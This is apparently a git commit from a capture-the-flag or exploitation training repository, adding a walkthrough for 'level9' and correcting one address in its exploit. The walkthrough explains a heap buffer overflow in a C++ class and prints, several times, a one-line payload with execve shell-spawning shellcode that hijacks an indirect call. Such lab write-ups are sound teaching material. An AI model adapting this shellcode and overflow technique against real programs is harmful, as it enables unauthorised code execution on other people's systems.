level9: walkthrough done and typo fix in the exploit

2025-05-06 20:47:10 +02:00 · 2025-05-06 20:47:10 +02:00 · 31decad298
commit 31decad298
parent 428102a376
2 changed files with 23 additions and 1 deletions
--- a/level9/ressources/exploit
+++ b/level9/ressources/exploit
@ -1 +1 @@
-./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
+./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
--- a/level9/walkthrough
+++ b/level9/walkthrough
@ -0,0 +1,22 @@
 # Level9
 Using BinaryNinja, we can decompile the code and see that it's from a cpp source code.
 It has a class named `N`, containing:
 - 2 attributes `char annotation[100]` and `int nb`
 - a constructor setting `int nb`
 - the method `setAnnotation()`, doing a `memcpy()` of a string into `annotation`
 - 2 operator overloads (`+` and `-`).
 The main allocates 2 instances (`a` and `b`) of this class. It will store their addresses in 2 other pointers.
 We have a non-secure call to `setAnnotation()` on `a` with `av[1]`, allowing us to overflow the annotation buffer.
 Using (this tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/] we can find the offset between `n1` and `eax`, resulting in 108.
 Now what we want to do is copy the address of our buffer in `eax`, which will then be moved to `edx` and eventually called (`call *%edx` at the end of the program).
 Let's build our exploit in 4 parts:
 - `"\x10\xa0\x04\x08"` => the address of the shell code injection which is `n1->annotation + 4` since we need to dereference it twice
 - `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the 25 bytes shell code injection
 - `"A"*79` => the remaining bytes to overflow until `eax` (4+25+79 = 108)
 - `"\x0c\xa0\x04\x08"` => the adress of the actual buffer in `n1->annotation`.
 Here is the command:
 `./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
 `
`@ -1 +1 @@`
	`./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')`	`./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')`